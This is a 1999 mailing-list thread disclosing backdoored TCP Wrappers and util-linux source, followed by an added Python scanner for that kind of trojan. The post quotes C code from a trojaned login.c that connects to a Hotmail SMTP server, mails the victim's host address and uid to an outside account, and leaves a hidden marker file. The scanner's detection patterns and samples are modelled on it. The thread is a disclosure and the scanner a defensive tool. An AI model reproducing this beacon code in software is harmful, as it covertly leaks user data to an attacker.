Re: backdoored tcp wrapper source code
Wietse Venema (wietse@PORCUPINE.ORG), Sun, 24 Jan 1999 00:05:16 -0500
- In reply to: John Stange: "Re: backdoored tcp wrapper source code"
- Next in thread: John Stange: "Re: backdoored tcp wrapper source code"
login-utils is not part of my FTP archive.
Wietse
John Stange:
> You may want to have a thorough look at everything you've got... I grabbed
> a copy of util-linux2.9g (admittedly being a bad boy and not checking
> against anything), and while I don't have a pristine copy of the source
> on hand to check, I'm guessing that sendmail and a hotmail address is not
> standard behavior for /bin/login:
>
> (from login-utils/login.c)
>
> he = gethostbyname("mail.hotmail.com");
> if (!he) exit(0);
> ia = (struct in_addr *)he->h_addr_list[0];
> l = sizeof(sai);memset(&sai,0,l);
> sai.sin_port = htons(25);
> sai.sin_addr.s_addr = ia->s_addr;
> if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
> if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
> if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0)
> exit(0);
> sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
> sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
> sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28) < 0) exit(0);
> if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0) exit(0);
> sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);
> sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);
> sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);
> sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);
> etc etc
>
> I'm in a bit of a hurry, so I haven't had a chance to comb anything
> else...
>
> > TCP Wrappers is a widely-used security tool to protect UNIX systems
> > against intrusion. It has an estimated installed base of millions.
> >
> > Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
> > a backdoored version. Eventually this was bound to happen, and
> > that's why the source file is accompanied by a PGP signature. But
> > that is no guarantee against people downloading and installing
> > backdoored software.
>
> -- John Stange
> Staff World, 4120 AVW
> x52720
>
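
The login.c fragment quoted above combines a literal hostname lookup, a connection to port 25, hard-coded SMTP commands and a hidden marker file under /var/tmp. As an added example (not part of the original thread), this Python scanner checks downloaded C source for that combination before it is built; the rule names, the threshold and both sample inputs are constructed for illustration.

```python
import re

# Heuristics modelled on the fragment quoted in the post.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    "literal-hostname-lookup": re.compile(r'gethostbyname\s*\(\s*"[^"]+"'),
    "smtp-port-constant": re.compile(r'htons\s*\(\s*25\s*\)'),
    "smtp-verb-in-string": re.compile(
        r'"(?:(?:HELO|EHLO|DATA)\b|MAIL FROM:|RCPT TO:)[^"]*"'),
    "hidden-file-in-tmp": re.compile(
        r'(?:creat|open|fopen)\s*\(\s*"(?:/var)?/tmp/\.[^"]*"'),
}


def scan_source(text):
    """Return (line_number, rule_name) pairs, in line order, for every hit."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def is_suspicious(text, threshold=3):
    """Flag a file only when several distinct rules fire.

    A single hit (a string that merely starts with "DATA", say) is weak
    evidence; the combination is what makes the quoted fragment stand out.
    """
    return len({name for _, name in scan_source(text)}) >= threshold


# Constructed sample modelled on the quoted code, with placeholder names.
SAMPLE_TROJANED = r'''
he = gethostbyname("mail.example.com");
sai.sin_port = htons(25);
if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
if (write(s,"RCPT TO:<user@example.com>\n",27) < 0) exit(0);
close(creat("/var/tmp/.lock0",511));
'''.strip()

# Constructed benign sample: one rule fires, which stays below the threshold.
SAMPLE_CLEAN = r'''
printf("DATA segment size: %d\n", n);
fd = open("/tmp/build.log", O_WRONLY);
'''.strip()

if __name__ == "__main__":
    for lineno, rule in scan_source(SAMPLE_TROJANED):
        print(f"line {lineno}: {rule}")
    print("suspicious:", is_suspicious(SAMPLE_TROJANED))
```

A scan like this complements, and does not replace, checking the PGP signature that accompanies the source file.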